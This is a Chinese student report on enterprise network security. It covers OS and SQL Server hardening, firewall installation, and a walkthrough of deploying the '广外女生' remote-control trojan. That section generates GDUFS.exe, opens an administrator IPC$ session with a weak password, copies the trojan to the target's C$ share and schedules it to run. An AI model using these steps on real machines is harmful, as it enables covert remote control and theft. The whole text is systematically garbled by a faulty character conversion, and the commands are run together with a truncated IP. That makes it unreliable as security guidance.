【企业网络】网络信息安全报告

XX中型企业网平安网络信息平安报告实验目的及要求该专周的目标是让学生掌握网络平安的根本框架，网络平安的根本理论。以及了解计算机网络平安方面的管理、配置和维护。本课程要求在理论教学上以必需够用为原那么，应尽量防止过深过繁的理论探讨，重在理解网络平安的根本框架，网络平安的根本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows2000的平安、Web的平安、网络平安工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解〔了解Windows的使用，具有键盘操作和文件处理的根底〕，并已经掌握计算机网络的根本原理。专周内容平安需求分析〔1〕网络平安问题主要集中在对效劳器的平安保护、防黑客和病毒、重要网段的保护及管理平安上。因此，我们必须采取相应的平安措施杜绝平安隐患，其中应该做到：公开效劳器的平安保护防止黑客从外部攻击入侵检测与监控病毒防护数据平安保护网络的平安管理〔2〕解决网络平安问题的一些要求A、大幅度地提高系统的平安性〔重点是可用性和可控性〕；B、保持网络原有的特点，即对网络的协议和传输具有良好的透明性，能透明接入，无需更改网络设置；C、易于操作、维护，并便于自动化管理，而不增加或少增加附加操作；D、尽量不影响原网络拓扑结构，同时便于系统及系统功能的扩展；E、平安保密系统具有较好的性能价格比。一次性投资，可以长期使用；F、平安产品具有合法性，及经过国家有关管理部门的认可或认证；〔3〕系统平安目标A、建立一套完整可行的网络平安与网络管理策略；B、将内部网络、公开效劳器网络和外网进行有效隔离，防止与外部网络直接通信；C、建立网站各主机和效劳器的平安保护措施，保证他们的系统平安；D、加强合法用户的访问认证，同时将用户的访问权限控制在最低限度；E、全面监视对公开效劳器的访问，及时发现和拒绝不平安的操作和黑客攻击行为；F、加强对各种访问的审计工作，详细记录对网络、公开效劳器的访问行为，形成完整的系统日志；网络拓扑网络平安的根本内容根本网络命令A、ping命令：ping–tIP，向指定的计算机不停的发送数据包，按Ctr+Break快捷键可以查看统计信息并继续运行，按Ctr+C可中止运行。B、Tracert命令：tracertIP显示从本地计算机到目标效劳器所经过的计算机：C、pathping除了显示路由外，还提供325S的分析，计算丧失包的%操作系统平安A、屏蔽不需要的效劳组件开始——程序——管理工具——效劳出现以下窗口：然后在该对话框中选中需要屏蔽的程序，并单击右键，然后选择“停止〞命令，同时将“启动类型〞设置为“手动〞或“已禁用〞，这样就可以对指定的效劳组进行屏蔽了。B、关闭默认共享：“开始〞——“程序〞——“管理工具〞——“效劳〞——“Server〞数据库系统平安A、使用平安的帐号策略和Windows认证模式

由于SQLServer不能更改sa用户名称，也不能删除这个超级用户，所以，我们必须对这个帐号进行最强的保护，当然，包括使用一个非常强壮的密码，最好不要在数据库应用中使用sa帐号，只有当没有其它方法登录到SQLServer实例(例如，当其它系统管理员不可用或忘记了密码)时才使用sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。平安的帐号策略还包括不要让管理员权限的帐号泛滥。

SQLServer的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候，应该对指向SQLServer的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越，原因在以下：

1)它通过限制对MicrosoftWindows用户和域用户帐户的连接，保护SQLServer免受大局部Internet工具的侵害。

2)效劳器将从Windows平安增强机制中获益，例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证，不需要将密码存放在连接字符串中。存储密码是使用标准SQLServer登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQLServer的EnterpriseManager安装Windows身份验证模式，步骤操作：展开效劳器组——右键点击效劳器——然后点击“属性〞——在平安性选项卡的身份验证中——点击“仅限Windows〞。网络防火墙工具：红墙主机网络防火墙安装1.具体操作如下：

第一步：将“爱思红墙主机网络防火墙〞的安装光盘插入驱动器，运行根目录下的Setup文件来运行其安装程序，进入“爱思红墙主机网络防火墙安装〞窗口；第二步：在“欢送安装爱思红墙主机网络防火墙〞对话框中，单击“下一步〞按钮；第三步：在“软件许可协议〞对话框，接受协议点击“是〞；第四步：点击“是〞按钮，出现显示您计算机的相关信息，即判断是否可以安装本软件；第五步：单击“下一步〞按钮，出现“选择目标位置〞对话框；第六步：在该对话框中，单击“浏览〞按钮，并在“选择文件夹〞对话框中选择盘符作为驱动器，再指定相应的文件夹及路径，然后单击“确定〞按钮；第七步：单击“下一步〞按钮，出现“选择安装程序名称〞对话框，您可自定义程序名称；第八步：单击“下一步〞按钮，系统开始复制文件；第九步：进入“红墙主机网络防火墙配置〞窗口，作出是否运行“红墙应用程序扫描系统〞的选择后，点击“完成〞。相关设置：告警设置：系统提供了两种情况下的告警，即需要系统告警和不需要系统告警，您可据需要选取告警设置。点击主界面中的“规那么管理〞按钮，弹出相应窗口，如下列图：网络监控中心：网络攻击工具：“广外女生〞它的根本功能有：文件管理方面有上传，下载，删除，改名，设置属性，建立文件夹和运行指定文件等功能；注册表操作方面：全面模拟WINDOWS的注册表编辑器，让远程注册表编辑工作有如在本机上操作一样方便；屏幕控制方面：可以自定义图片的质量来减少传输的时间，在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘，就像操纵自己的计算机一样；远程任务管理方面，可以直观地浏览对方窗体，随意杀掉对方窗体或其中的控件；其他功能还有邮件IP通知等。主要步骤：首先运行“gwg.exe〞，出现如图窗口：选中“效劳端设置〞，生成“GDUFS.exe〞木马：然后将“GDUFS.exe〞复制到自己的C盘中，再根据一些命令把“GDUFS.exe〞复制到目标主机的盘中，再进行运行。目标主机的IP：8具体步骤及命令：“开始〞——“运行〞——“cmd〞命令：netuse\\8\ipc$123/user:administrator与目标主机之间建立联系命令：nettime\\8获取目标主机的时间命令：at\\808:21netsharec$=c:与目标主机的C盘建立通道命令：copyc:\GDUFS.exe\\8\c$复制“GDUFS.exe〞文件到目标主机的C盘中：命令：810:49c:\GDUFS.exe指定“GDUFS.exe〞在目标主机中什么时候运行。

专周小结：通过这次网络平安专周，我不仅仅是学到了很多知识，更是透彻的理解到了网络平安对生活已经将来工作的意义。网络平安分为软件网络平安和硬件网络平安。一般我们说的网络平安就是软件上的网络平安，即局域网，互联网平安。网络平安又分为内网平安和外网平安。在内外网平安中，内网平安那么是重中之重。毕竟是家贼难防。据不完全统计，全国因为内网平安的问题，至少每年算是几亿美元。所以，网络平安特别重要。至于在将来的工作中，我们也要严格尊市网络设备管理原那么和使用秩序，对设备进行统一管理专人负责，严格要求